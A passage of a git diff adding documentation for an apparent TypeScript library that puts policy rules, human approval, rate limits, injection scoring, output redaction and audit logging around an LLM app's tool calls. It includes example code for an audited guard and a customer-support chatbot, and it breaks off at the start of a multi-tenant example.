`approved` | `boolean` | Yes | Whether the tool call is approved | +| `patchedArgs` | `Record<string, unknown>` | No | Partial argument overrides; merged with `originalArgs` when provided ("approve with edits") | +| `approvedBy` | `string` | No | Identity of the approver for audit records | +| `reason` | `string` | No | Human-readable reason for denial when `approved` is `false` | + +--- + +### `ApprovalHandler` + +```ts +type ApprovalHandler = (token: ApprovalToken) => Promise<ApprovalResolution>; +``` + +Callback type the consumer implements. Receives an `ApprovalToken` representing +the pending tool call, presents it to a human or automated approver, and resolves +with the decision. + +--- + +## Rate Limiting + +### `RateLimitConfig` + +Configuration for per-tool rate limiting. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `maxCalls` | `number` | Yes | Maximum calls allowed within the window | +| `windowMs` | `number` | Yes | Sliding window duration in milliseconds | +| `strategy` | `"reject" \| "queue"` | No | Backpressure strategy when limit is hit. `"reject"` returns immediately; `"queue"` blocks until a slot is available. Default: `"reject"` | + +--- + +### `RateLimitState` + +Internal sliding-window state maintained by `RateLimiter` for each tool. + +| Field | Type | Description | +|---|---|---| +| `timestamps` | `number[]` | Unix timestamps (ms) of recent call acquisitions within the current window | +| `activeCalls` | `number` | Current count of in-flight calls for concurrency tracking | + +--- + +## Injection + +### `InjectionDetectorConfig` + +Configuration for prompt injection detection. + +| Field | Type | Required | Description | +|---|---|---|---| +| `threshold` | `number` | No | Suspicion score at or above which a call is flagged. Range 0–1. Default: `0.5` | +| `action` | `"downgrade" \| "deny" \| "log"` | No | Action taken when injection is suspected. `"downgrade"` converts the verdict to `"require-approval"`, `"deny"` blocks the call, `"log"` records but allows. Default: `"log"` | +| `detect` | `(args: Record<string, unknown>) => number \| Promise<number>` | No | Custom detector function; overrides the built-in heuristic. Return a suspicion score 0–1. | + +--- + +## MCP + +### `McpToolFingerprint` + +Pinned schema fingerprint for a single MCP tool. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `serverId` | `string` | Yes | Identifier of the MCP server | +| `schemaHash` | `string` | Yes | SHA-256 hex hash of the canonicalized `{ toolName, schema }` object | +| `pinnedAt` | `string` | Yes | ISO-8601 timestamp of when the fingerprint was created | +| `environment` | `string` | No | Environment tag such as `"production"` or `"staging"` | + +--- + +### `McpDriftResult` + +Aggregate result returned by `detectDrift()`. + +| Field | Type | Description | +|---|---|---| +| `drifted` | `boolean` | `true` when at least one tool has changed or is not pinned | +| `changes` | `McpDriftChange[]` | Detailed records for each changed or unpinned tool | + +--- + +### `McpDriftChange` + +Detail record for a single tool that has drifted from its pinned fingerprint. + +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the changed tool | +| `serverId` | `string` | MCP server identifier | +| `expectedHash` | `string` | Pinned hash, or `"(not pinned)"` for tools without a stored fingerprint | +| `actualHash` | `string` | Currently computed hash | +| `remediation` | `string` | Human-readable description of what changed and recommended action | + +--- + +## OTel + +### `OtelConfig` + +Configuration for the OpenTelemetry integration. + +| Field | Type | Required | Description | +|---|---|---|---| +| `enabled` | `boolean` | No | Set to `false` to disable tracing entirely and use no-op spans. Default: `true` when `@opentelemetry/api` is available | +| `tracerName` | `string` | No | Tracer name registered with the OTel provider. Default: `"ai-tool-guard"` | +| `defaultAttributes` | `Record` | No | Attributes merged into every span emitted by span helper functions | + +--- + +## Top-level + +### `GuardOptions` + +The main configuration object passed to `createToolGuard()`. Controls all aspects +of the guard pipeline. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `rules` | `PolicyRule[]` | No | Built-in policy rules evaluated for every tool call | +| `backend` | `PolicyBackend` | No | External policy backend (OPA, Cedar, custom); takes priority over built-in rules | +| `defaultRiskLevel` | `RiskLevel` | No | Fallback risk level for tools without explicit `ToolGuardConfig.riskLevel`. Default: `"low"` | +| `onApprovalRequired` | `ApprovalHandler` | No | Callback invoked when a policy verdict or tool config requires human approval | +| `injectionDetection` | `InjectionDetectorConfig` | No | Global injection detection applied to all tool calls | +| `defaultRateLimit` | `RateLimitConfig` | No | Default rate limit applied to all tools that do not specify their own | +| `defaultMaxConcurrency` | `number` | No | Default concurrency cap applied to all tools that do not specify their own | +| `otel` | `OtelConfig` | No | OpenTelemetry configuration | +| `dryRun` | `boolean` | No | When `true`, policy is evaluated and decisions are recorded, but tools are not executed | +| `onDecision` | `(record: DecisionRecord) => void \| Promise<void>` | No | Callback fired for every policy decision; use for logging, metrics, or audit trails | +| `resolveUserAttributes` | `() => Record<string, unknown> \| Promise<Record<string, unknown>>` | No | Async resolver called per invocation to populate `PolicyContext.userAttributes` | +| `resolveConversationContext` | `() => ConversationContext \| Promise<ConversationContext>` | No | Async resolver called per invocation to populate `PolicyContext.conversation` | diff --git a/docs/examples/audit-logging.md b/docs/examples/audit-logging.md new file mode 100644 index 0000000..ea54341 --- /dev/null +++ b/docs/examples/audit-logging.md @@ -0,0 +1,507 @@ +# Complete Audit Trail + +This example builds a comprehensive audit system on top of `ai-tool-guard`. Every decision — allow, deny, or require-approval — is written to a structured JSON lines log. Output filter redactions are tracked alongside policy decisions. 
OpenTelemetry spans are correlated with decision records. A simple alerting function detects repeated denials in the same session. + +--- + +## Decision record structure + +The `DecisionRecord` type captures the full context of every policy evaluation. Understanding its fields is the foundation of any audit system. + +```ts +interface DecisionRecord { + id: string; // Unique ID for correlation with OTel spans and logs + timestamp: string; // ISO-8601 (e.g. "2026-02-17T14:23:01.123Z") + verdict: "allow" | "deny" | "require-approval"; + toolName: string; + matchedRules: string[]; // IDs of the rules that produced this verdict + riskLevel: "low" | "medium" | "high" | "critical"; + riskCategories: string[]; // e.g. ["data-write", "pii"] + attributes: Record; // userAttributes snapshot + reason: string; // Human-readable explanation + redactions?: string[]; // Output filter redaction trail + evalDurationMs: number; // Policy evaluation time in ms + dryRun: boolean; +} +``` + +--- + +## Structured audit logger + +The logger writes every decision to a JSON lines file, routing events through separate handlers for each verdict type. + +```ts title="lib/audit-logger.ts" +import { appendFileSync, mkdirSync } from "node:fs"; +import { dirname } from "node:path"; +import type { DecisionRecord } from "ai-tool-guard"; + +export interface AuditEvent { + /** ISO-8601 write timestamp (may differ slightly from record.timestamp). */ + writtenAt: string; + record: DecisionRecord; +} + +export class AuditLogger { + private readonly logPath: string; + + constructor(logPath: string) { + this.logPath = logPath; + mkdirSync(dirname(logPath), { recursive: true }); + } + + /** Write a decision record to the log. 
*/ + write(record: DecisionRecord): void { + const event: AuditEvent = { + writtenAt: new Date().toISOString(), + record, + }; + + try { + appendFileSync(this.logPath, JSON.stringify(event) + "\n", { + encoding: "utf8", + flag: "a", + }); + } catch (err) { + // Audit failures must never crash the application. + console.error("[audit] Write failed:", (err as Error).message, record.id); + } + } + + /** Handler for allowed decisions. */ + onAllow(record: DecisionRecord): void { + if (record.redactions && record.redactions.length > 0) { + console.info( + `[audit:allow+redact] id=${record.id} tool=${record.toolName} ` + + `redactions=${record.redactions.join(",")}` + ); + } + this.write(record); + } + + /** Handler for denied decisions. */ + onDeny(record: DecisionRecord): void { + console.warn( + `[audit:deny] id=${record.id} tool=${record.toolName} ` + + `rules=${record.matchedRules.join(",")} reason="${record.reason}"` + ); + this.write(record); + } + + /** Handler for approval-required decisions. */ + onApprovalRequired(record: DecisionRecord): void { + console.info( + `[audit:approval] id=${record.id} tool=${record.toolName} ` + + `risk=${record.riskLevel}` + ); + this.write(record); + } + + /** Dispatch a record to the appropriate handler. */ + dispatch(record: DecisionRecord): void { + switch (record.verdict) { + case "allow": + this.onAllow(record); + break; + case "deny": + this.onDeny(record); + break; + case "require-approval": + this.onApprovalRequired(record); + break; + } + } +} + +export const auditLogger = new AuditLogger("/var/log/tool-guard/decisions.jsonl"); +``` + +--- + +## Alert on repeated denials + +A session that accumulates multiple denials in a short window may indicate an adversarial prompt or a misconfigured model. The alerter reads recent denials from an in-memory ring buffer and fires when a threshold is crossed. 
+ +```ts title="lib/denial-alerter.ts" +import type { DecisionRecord } from "ai-tool-guard"; + +interface DenialEvent { + toolName: string; + timestamp: number; + reason: string; + decisionId: string; +} + +export class DenialAlerter { + /** Per-session denial ring buffers. */ + private readonly buffers = new Map(); + + /** Threshold: fire an alert if this many denials occur within windowMs. */ + constructor( + private readonly threshold: number = 3, + private readonly windowMs: number = 60_000 + ) {} + + /** + * Record a denial and fire the alert callback if the threshold is reached. + */ + record( + sessionId: string, + record: DecisionRecord, + onAlert: (sessionId: string, events: DenialEvent[]) => void + ): void { + if (record.verdict !== "deny") return; + + const now = Date.now(); + + // Prune events outside the window. + const buffer = (this.buffers.get(sessionId) ?? []).filter( + (e) => now - e.timestamp < this.windowMs + ); + + buffer.push({ + toolName: record.toolName, + timestamp: now, + reason: record.reason, + decisionId: record.id, + }); + + this.buffers.set(sessionId, buffer); + + if (buffer.length >= this.threshold) { + onAlert(sessionId, [...buffer]); + } + } + + /** Clear the buffer for a session (e.g. after an alert is acknowledged). */ + clear(sessionId: string): void { + this.buffers.delete(sessionId); + } +} + +export const denialAlerter = new DenialAlerter(3, 60_000); +``` + +--- + +## OpenTelemetry correlation + +`ai-tool-guard` emits an `ai_tool_guard.policy_eval` span for every decision. The span carries `ai_tool_guard.tool.name` as an attribute, which you can use to correlate spans with decision records. + +The example below creates the guard with OTel enabled and uses `spanFromDecision` directly in a custom wrapper to attach the decision ID to the span as an additional attribute. 
+ +```ts title="lib/otel-guard.ts" +import { + createToolGuard, + spanFromDecision, + createTracer, + allow, + requireApproval, + deny, + type DecisionRecord, +} from "ai-tool-guard"; +import { auditLogger } from "./audit-logger"; +import { denialAlerter } from "./denial-alerter"; + +// Tracer shared with the rest of the application. +// The guard creates its own internal tracer via the otel config, but you +// can use createTracer to obtain the same tracer for manual instrumentation. +const tracer = createTracer({ tracerName: "ai-tool-guard" }); + +export function createAuditedGuard(sessionId: string) { + return createToolGuard({ + rules: [ + allow({ + tools: ["readDocument", "searchDocuments"], + riskLevels: ["low"], + description: "Read operations are safe to execute autonomously.", + priority: 10, + }), + requireApproval({ + tools: ["writeDocument", "deleteDocument"], + riskLevels: ["medium", "high"], + description: "Write and delete operations require approval.", + priority: 20, + }), + deny({ + tools: "purgeAll", + riskLevels: ["critical"], + description: "Bulk purge is never permitted through the AI assistant.", + priority: 100, + }), + ], + + defaultRiskLevel: "medium", + + otel: { + enabled: true, + tracerName: "ai-tool-guard", + defaultAttributes: { + "service.name": "document-assistant", + "deployment.environment": "production", + "session.id": sessionId, + }, + }, + + onApprovalRequired: async (token) => { + console.info(`[approval] token=${token.id} tool=${token.toolName}`); + return { approved: false, reason: "Approval workflow not configured." }; + }, + + onDecision: (record: DecisionRecord) => { + // 1. Dispatch to the structured audit logger. + auditLogger.dispatch(record); + + // 2. Attach the decision ID to a new span for cross-signal correlation. + // When you search by decision ID in your log, you can find the + // corresponding trace by looking up this span in your OTel backend. 
+ const correlationSpan = tracer.startSpan("ai_tool_guard.decision_logged", { + attributes: { + "ai_tool_guard.decision.id": record.id, + "ai_tool_guard.tool.name": record.toolName, + "ai_tool_guard.decision.verdict": record.verdict, + "session.id": sessionId, + }, + }); + correlationSpan.end(); + + // 3. Alert on repeated denials. + denialAlerter.record(sessionId, record, (sid, events) => { + console.error( + `[ALERT] Session ${sid} has ${events.length} denials in 60 s: ` + + events.map((e) => e.toolName).join(", ") + ); + + // Emit an alert span that will appear in your trace backend. + const alertSpan = tracer.startSpan("ai_tool_guard.denial_alert", { + attributes: { + "session.id": sid, + "alert.denial_count": events.length, + "alert.tools": events.map((e) => e.toolName).join(","), + }, + }); + alertSpan.end(); + }); + }, + }); +} +``` + +--- + +## Querying the audit log + +The JSON lines format makes the log easy to parse with standard tools or a simple query function. + +```ts title="lib/audit-query.ts" +import { createReadStream } from "node:fs"; +import { createInterface } from "node:readline"; +import type { AuditEvent } from "./audit-logger"; + +/** + * Read all decisions from the log file and apply an optional predicate. + */ +export async function queryAuditLog( + logPath: string, + predicate?: (event: AuditEvent) => boolean +): Promise { + const results: AuditEvent[] = []; + + const rl = createInterface({ + input: createReadStream(logPath, { encoding: "utf8" }), + crlfDelay: Infinity, + }); + + for await (const line of rl) { + if (!line.trim()) continue; + try { + const event = JSON.parse(line) as AuditEvent; + if (!predicate || predicate(event)) { + results.push(event); + } + } catch { + // Skip malformed lines. 
+ } + } + + return results; +} + +// --------------------------------------------------------------------------- +// Example queries +// --------------------------------------------------------------------------- + +/** All denials for a specific session. */ +export async function getDenialsForSession( + logPath: string, + sessionId: string +): Promise { + return queryAuditLog( + logPath, + (e) => + e.record.verdict === "deny" && + e.record.attributes["sessionId"] === sessionId + ); +} + +/** All records for a specific tool, newest first. */ +export async function getToolHistory( + logPath: string, + toolName: string +): Promise { + const events = await queryAuditLog( + logPath, + (e) => e.record.toolName === toolName + ); + return events.sort( + (a, b) => + new Date(b.record.timestamp).getTime() - + new Date(a.record.timestamp).getTime() + ); +} + +/** All decisions where output was redacted. */ +export async function getRedactionEvents( + logPath: string +): Promise { + return queryAuditLog( + logPath, + (e) => + e.record.verdict === "allow" && + Array.isArray(e.record.redactions) && + e.record.redactions.length > 0 + ); +} + +/** Summary statistics grouped by verdict. 
*/ +export async function verdictSummary(logPath: string): Promise<{ + allow: number; + deny: number; + "require-approval": number; +}> { + const counts = { allow: 0, deny: 0, "require-approval": 0 }; + const events = await queryAuditLog(logPath); + for (const e of events) { + counts[e.record.verdict]++; + } + return counts; +} +``` + +--- + +## Putting it together in a route + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { tool } from "ai"; +import { z } from "zod"; +import { ToolGuardError, secretsFilter } from "ai-tool-guard"; +import { createAuditedGuard } from "@/lib/otel-guard"; + +export async function POST(request: Request) { + const { messages, sessionId } = await request.json(); + + const guard = createAuditedGuard(sessionId as string); + + const readDocumentTool = tool({ + description: "Read a document by ID.", + parameters: z.object({ docId: z.string() }), + execute: async ({ docId }) => ({ + docId, + content: "Document content here...", + author: "alice@example.com", // will be redacted + }), + }); + + const writeDocumentTool = tool({ + description: "Write or update a document.", + parameters: z.object({ docId: z.string(), content: z.string() }), + execute: async ({ docId, content }) => ({ saved: true, docId, content }), + }); + + const tools = guard.guardTools({ + readDocument: { + tool: readDocumentTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [secretsFilter()], + }, + writeDocument: { + tool: writeDocumentTool, + riskLevel: "medium", + riskCategories: ["data-write"], + }, + }); + + try { + const result = streamText({ + model: openai("gpt-4o-mini"), + messages, + tools, + maxSteps: 3, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + decisionId: err.decision?.id, + }, + { status: err.code === 
"rate-limited" ? 429 : 403 } + ); + } + + console.error("Unexpected error:", err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## Sample log output + +A typical `decisions.jsonl` file looks like this. Each line is a complete, self-contained JSON object suitable for ingestion into Elasticsearch, Loki, or any structured log platform. + +```json +{"writtenAt":"2026-02-17T14:23:01.456Z","record":{"id":"rec_abc123","timestamp":"2026-02-17T14:23:01.123Z","verdict":"allow","toolName":"readDocument","matchedRules":["allow-1"],"riskLevel":"low","riskCategories":["data-read"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched allow rule: Read operations are safe to execute autonomously.","redactions":["pii-output-filter:email"],"evalDurationMs":2,"dryRun":false}} +{"writtenAt":"2026-02-17T14:23:45.789Z","record":{"id":"rec_def456","timestamp":"2026-02-17T14:23:45.500Z","verdict":"deny","toolName":"purgeAll","matchedRules":["deny-1"],"riskLevel":"critical","riskCategories":["data-delete"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched deny rule: Bulk purge is never permitted through the AI assistant.","evalDurationMs":1,"dryRun":false}} +{"writtenAt":"2026-02-17T14:24:10.321Z","record":{"id":"rec_ghi789","timestamp":"2026-02-17T14:24:10.100Z","verdict":"require-approval","toolName":"writeDocument","matchedRules":["require-approval-1"],"riskLevel":"medium","riskCategories":["data-write"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched require-approval rule: Write and delete operations require approval.","evalDurationMs":3,"dryRun":false}} +``` + +--- + +## Compliance checklist + +When building for regulated environments, verify that your audit setup covers the following. 
+ +| Requirement | How it is met | +|---|---| +| Every tool call is logged | `onDecision` fires for every verdict, including `allow` | +| Denials include the reason | `record.reason` and `record.matchedRules` | +| Output mutations are tracked | `record.redactions` lists every filter and field name | +| Approvals are recorded | `require-approval` verdict written to log; `approvedBy` available via the approval handler | +| Timestamps are tamper-evident | Append-only log file; use a WORM store in production | +| Decisions are traceable in OTel | Decision ID attached to `ai_tool_guard.decision_logged` span | +| Alerts on anomalies | `DenialAlerter` fires on session-level denial bursts | + +!!! tip "Long-term storage" + For compliance archives, ship the JSONL file to an immutable object store (AWS S3 with Object Lock, GCS with retention policies) at the end of each day. Keep the live file on fast local storage for real-time queries. + +!!! warning "PII in decision records" + The `attributes` field contains the full `userAttributes` snapshot, which may include user IDs, email addresses, or role data. Ensure your log storage is access-controlled and review your data retention policy before enabling long-term archival. + +--- + +## Related + +- [Decision Records](../guides/decision-records.md) — full `DecisionRecord` field reference. +- [OpenTelemetry](../guides/opentelemetry.md) — span names, attributes, and SDK setup. +- [Output Filtering](../guides/output-filtering.md) — how redactions are tracked and reported. +- [Error Handling](../guides/error-handling.md) — `ToolGuardError` and the `decision` property. 
diff --git a/docs/examples/chatbot-safety.md b/docs/examples/chatbot-safety.md new file mode 100644 index 0000000..a7a7d3d --- /dev/null +++ b/docs/examples/chatbot-safety.md @@ -0,0 +1,486 @@ +# Building a Safe Chatbot + +This example builds a customer support chatbot with layered defenses: injection detection on incoming input, argument validation on every tool call, output filtering to prevent data leakage, conversation-aware escalation, and rate limiting to resist abuse. The five tools span all four risk levels (low, medium, high, critical) so you can see how the guard behaves across the spectrum. + +--- + +## Tool inventory + +| Tool | Risk | Category | Guard behaviour | +|---|---|---|---| +| `lookupOrder` | low | data-read | Allow; scrub PII from output | +| `updateAddress` | medium | data-write, pii | Require approval; validate address format | +| `issueRefund` | high | payment | Require approval; validate reason allowlist | +| `deleteAccount` | critical | data-delete | Deny always | +| `exportData` | high | data-read | Deny unless admin role (admins still require approval); scrub secrets from output | + +--- + +## Complete guard setup + +```ts title="lib/chatbot-guard.ts" +import { + createToolGuard, + allow, + deny, + requireApproval, + type DecisionRecord, + type ConversationContext, +} from "ai-tool-guard"; +import { appendFileSync } from "node:fs"; + +// --------------------------------------------------------------------------- +// Conversation context store +// +// In production, back this with a session store (Redis, DynamoDB, etc.). 
+// --------------------------------------------------------------------------- +const sessions = new Map(); + +export function getSession(sessionId: string): ConversationContext { + if (!sessions.has(sessionId)) { + sessions.set(sessionId, { + sessionId, + riskScore: 0, + priorFailures: 0, + recentApprovals: [], + }); + } + return sessions.get(sessionId)!; +} + +export function updateSession( + sessionId: string, + patch: Partial +): void { + const current = getSession(sessionId); + sessions.set(sessionId, { ...current, ...patch }); +} + +// --------------------------------------------------------------------------- +// Audit log — append-only JSON lines file +// --------------------------------------------------------------------------- +const AUDIT_LOG = "/var/log/chatbot-audit.jsonl"; + +function writeAudit(record: DecisionRecord): void { + try { + appendFileSync(AUDIT_LOG, JSON.stringify(record) + "\n"); + } catch { + // Audit write failures must never crash the request. + console.error("Audit log write failed", record.id); + } +} + +// --------------------------------------------------------------------------- +// Guard factory +// --------------------------------------------------------------------------- + +export function createChatbotGuard(sessionId: string) { + return createToolGuard({ + // ------------------------------------------------------------------ + // Policy rules — evaluated in descending priority order. + // ------------------------------------------------------------------ + rules: [ + // Hard block on account deletion — no conditions, no exceptions. + deny({ + tools: "deleteAccount", + riskLevels: ["critical"], + description: "Account deletion is never permitted through the AI assistant.", + priority: 100, + }), + + // Escalate entire session if risk score is too high. + deny({ + tools: "*", + description: "Session risk score exceeds safe threshold.", + condition: (ctx) => (ctx.conversation?.riskScore ?? 
0) > 0.8, + priority: 90, + }), + + // After three prior failures in a session, require approval for everything. + requireApproval({ + tools: "*", + description: "Session has accumulated too many failures.", + condition: (ctx) => (ctx.conversation?.priorFailures ?? 0) >= 3, + priority: 80, + }), + + // Data export is admin-only. + deny({ + tools: "exportData", + description: "Data export restricted to admin users.", + condition: (ctx) => ctx.userAttributes["role"] !== "admin", + priority: 70, + }), + + // High-risk tools require approval. + requireApproval({ + tools: ["issueRefund", "exportData"], + riskLevels: ["high"], + description: "High-risk tools require human sign-off.", + priority: 50, + }), + + // Medium-risk tools require approval. + requireApproval({ + tools: "updateAddress", + riskLevels: ["medium"], + description: "Address changes require human confirmation.", + priority: 40, + }), + + // Low-risk reads are allowed outright. + allow({ + tools: "lookupOrder", + riskLevels: ["low"], + description: "Read-only order lookups are safe to execute autonomously.", + priority: 10, + }), + ], + + defaultRiskLevel: "medium", + + // ------------------------------------------------------------------ + // Injection detection + // + // threshold: 0.5 — flag calls where the suspicion score meets or + // exceeds 50 %. action: "deny" — block suspected injections outright + // rather than downgrading or logging only. Public-facing chatbots + // should be strict here. + // ------------------------------------------------------------------ + injectionDetection: { + threshold: 0.5, + action: "deny", + }, + + // ------------------------------------------------------------------ + // Global rate limits + // + // Caps apply per tool name across all sessions sharing this guard + // instance. Per-tool overrides are set on individual tool configs. 
+ // ------------------------------------------------------------------ + defaultRateLimit: { + maxCalls: 60, + windowMs: 60_000, // 60 calls per minute globally + strategy: "reject", + }, + + // ------------------------------------------------------------------ + // Approval handler — in this example, approvals are logged and + // auto-denied (implement a real UI in production). + // ------------------------------------------------------------------ + onApprovalRequired: async (token) => { + console.warn( + `[approval-required] tool=${token.toolName} token=${token.id}` + ); + return { + approved: false, + reason: "Automated approval not available. Contact support.", + }; + }, + + // ------------------------------------------------------------------ + // Conversation context — resolved fresh on every tool invocation. + // ------------------------------------------------------------------ + resolveConversationContext: () => getSession(sessionId), + + // ------------------------------------------------------------------ + // Decision callback — runs after every verdict. + // ------------------------------------------------------------------ + onDecision: (record) => { + // 1. Write to audit log. + writeAudit(record); + + // 2. Update session risk score on denial. + if (record.verdict === "deny") { + const session = getSession(sessionId); + updateSession(sessionId, { + riskScore: Math.min(1, (session.riskScore ?? 0) + 0.15), + priorFailures: (session.priorFailures ?? 0) + 1, + }); + } + + // 3. Track approvals in session context. + if (record.verdict === "require-approval") { + const session = getSession(sessionId); + updateSession(sessionId, { + recentApprovals: [ + ...(session.recentApprovals ?? 
[]), + record.toolName, + ].slice(-10), // keep last 10 + }); + } + }, + }); +} +``` + +--- + +## Tool definitions with per-tool guards + +```ts title="lib/chatbot-tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { + zodGuard, + allowlist, + piiGuard, + secretsFilter, + piiOutputFilter, +} from "ai-tool-guard"; +import { createChatbotGuard } from "./chatbot-guard"; + +// --------------------------------------------------------------------------- +// Raw tools +// --------------------------------------------------------------------------- + +const lookupOrderTool = tool({ + description: "Retrieve order status and shipment details.", + parameters: z.object({ orderId: z.string() }), + execute: async ({ orderId }) => ({ + orderId, + status: "in_transit", + carrier: "FedEx", + trackingNumber: "123456789012", + estimatedDelivery: "2026-02-20", + customerEmail: "customer@example.com", // redacted by piiOutputFilter + }), +}); + +const updateAddressTool = tool({ + description: "Change the delivery address on an unshipped order.", + parameters: z.object({ + orderId: z.string(), + newAddress: z.string(), + }), + execute: async ({ orderId, newAddress }) => ({ + success: true, + orderId, + updatedAddress: newAddress, + }), +}); + +const issueRefundTool = tool({ + description: "Issue a refund for a completed order.", + parameters: z.object({ + orderId: z.string(), + amount: z.number().positive(), + reason: z.string(), + }), + execute: async ({ orderId, amount, reason }) => ({ + success: true, + orderId, + refundedAmount: amount, + reason, + transactionId: "txn_abc123", + }), +}); + +const deleteAccountTool = tool({ + description: "Permanently delete a customer account.", + parameters: z.object({ userId: z.string() }), + execute: async ({ userId }) => ({ deleted: true, userId }), +}); + +const exportDataTool = tool({ + description: "Export all data for a customer account.", + parameters: z.object({ + userId: z.string(), + format: z.enum(["csv", "json"]), + 
}), + execute: async ({ userId, format }) => ({ + exportUrl: `https://internal.example.com/exports/${userId}.${format}`, + // Internal URL may contain credentials — secretsFilter will redact them. + downloadUrl: `https://internal.example.com/exports/${userId}.${format}?api_key=sk-prod-1234567890abcdef`, + }), +}); + +// --------------------------------------------------------------------------- +// Wrap with guard — call once per session +// --------------------------------------------------------------------------- + +export function buildTools(sessionId: string) { + const guard = createChatbotGuard(sessionId); + + return guard.guardTools({ + lookupOrder: { + tool: lookupOrderTool, + riskLevel: "low", + riskCategories: ["data-read"], + // Redact PII (email, phone) from order records returned to the model. + outputFilters: [piiOutputFilter()], + rateLimit: { maxCalls: 20, windowMs: 60_000 }, + }, + + updateAddress: { + tool: updateAddressTool, + riskLevel: "medium", + riskCategories: ["data-write", "pii"], + argGuards: [ + // Order IDs must follow the ORD-XXXXXX pattern. + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID."), + }), + // Scan the user-supplied address field for PII before it reaches the tool. + piiGuard("newAddress"), + ], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 5, windowMs: 60_000 }, + }, + + issueRefund: { + tool: issueRefundTool, + riskLevel: "high", + riskCategories: ["payment"], + argGuards: [ + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID."), + }), + // Cap refund amounts per call. + zodGuard({ + field: "amount", + schema: z.number().positive().max(500), + }), + // Only these refund reasons are permitted. 
+ allowlist("reason", [ + "damaged_item", + "not_received", + "wrong_item", + "duplicate_charge", + ]), + ], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 3, windowMs: 60_000 }, + }, + + deleteAccount: { + tool: deleteAccountTool, + riskLevel: "critical", + riskCategories: ["data-delete"], + // No filters needed — the deny rule fires before execution. + }, + + exportData: { + tool: exportDataTool, + riskLevel: "high", + riskCategories: ["data-read"], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 2, windowMs: 3_600_000 }, // 2 per hour + }, + }); +} +``` + +--- + +## Using the tools in a route + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { ToolGuardError } from "ai-tool-guard"; +import { buildTools } from "@/lib/chatbot-tools"; + +export async function POST(request: Request) { + const { messages, sessionId } = await request.json(); + + // Build a fresh tool set bound to this session's context and risk state. + const tools = buildTools(sessionId as string); + + try { + const result = streamText({ + model: openai("gpt-4o-mini"), + system: + "You are a helpful customer support agent. " + + "Never attempt to delete accounts or export bulk data. " + + "Always confirm order IDs before taking action.", + messages, + tools, + maxSteps: 4, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + const statusMap: Record<string, number> = { + "policy-denied": 403, + "injection-detected": 400, + "rate-limited": 429, + "arg-validation-failed": 422, + "output-blocked": 500, + }; + + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + message: err.message, + decision: err.decision + ? { + id: err.decision.id, + matchedRules: err.decision.matchedRules, + reason: err.decision.reason, + } + : undefined, + }, + { status: statusMap[err.code] ?? 
403 } + ); + } + + console.error("Unexpected error:", err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## How the layers interact + +The guard processes each tool invocation through a fixed pipeline. Understanding the order helps predict which layer fires when multiple conditions are true simultaneously. + +``` +Incoming tool call + │ + ▼ +1. Injection detection (threshold 0.5, action "deny") + │ suspected → ToolGuardError("injection-detected") + ▼ +2. Argument guards (zodGuard, allowlist, piiGuard) + │ violation → ToolGuardError("arg-validation-failed") + ▼ +3. Policy evaluation (rules in priority order, conversation context) + │ deny → ToolGuardError("policy-denied") + │ approval → onApprovalRequired callback + ▼ +4. Rate limiting (per-tool maxCalls / windowMs) + │ exceeded → ToolGuardError("rate-limited") + ▼ +5. Tool execution + │ + ▼ +6. Output filters (secretsFilter, piiOutputFilter) + │ blocked → ToolGuardError("output-blocked") + ▼ +Final result returned to the model +``` + +!!! info "Conversation risk score" + The `riskScore` stored in the session context is updated in `onDecision` after every denial. Once it exceeds 0.8, a high-priority `deny` rule fires for all subsequent tool calls in that session, regardless of the tool's own risk level. This provides a circuit-breaker against adversarial conversation loops. + +!!! warning "piiGuard on input vs piiOutputFilter on output" + `piiGuard` (applied via `argGuards`) blocks calls where the model passes PII in the arguments. `piiOutputFilter` (applied via `outputFilters`) redacts PII from the tool's return value before the model sees it. Use both together for end-to-end PII coverage. + +--- + +## Related + +- [Policy Engine](../guides/policy-engine.md) — rule priority and escalation semantics. +- [Injection Detection](../guides/injection-detection.md) — threshold tuning and custom detectors. 
+- [Argument Validation](../guides/argument-validation.md) — `zodGuard`, `allowlist`, `piiGuard`. +- [Output Filtering](../guides/output-filtering.md) — `secretsFilter` and `piiOutputFilter`. +- [Rate Limiting](../guides/rate-limiting.md) — per-tool and global limits. +- [Conversation-Aware Policies](../guides/conversation-aware-policies.md) — `ConversationContext` in depth. diff --git a/docs/examples/multi-tenant.md b/docs/examples/multi-tenant.md new file mode 100644 index 0000000..882ab8f --- /dev/null +++ b/docs/examples/multi-tenant.md @@ -0,0 +1,476 @@ +# Multi-Tenant Policies + +This example models a SaaS platform where different tenants receive different tool access depending on their subscription plan and the user's role within that tenant. The guard is instantiated per-request, and `resolveUserAttributes` returns a full tenant context that policy rules can inspect. + +--- + +## Tenant model + +| Plan | Roles | What they can do | +|---|---|---| +| free | viewer | Read-only tool access | +| pro | viewer, editor | Read + write; no bulk operations | +| enterprise | viewer, editor, admin | Full access including bulk operations and admin tools | + +--- + +## Tenant context resolver + +The `resolveUserAttributes` callback is called once per tool invocation. It should read from your authentication layer — a JWT, a session cookie, or a middleware-injected header. + +```ts title="lib/tenant.ts" 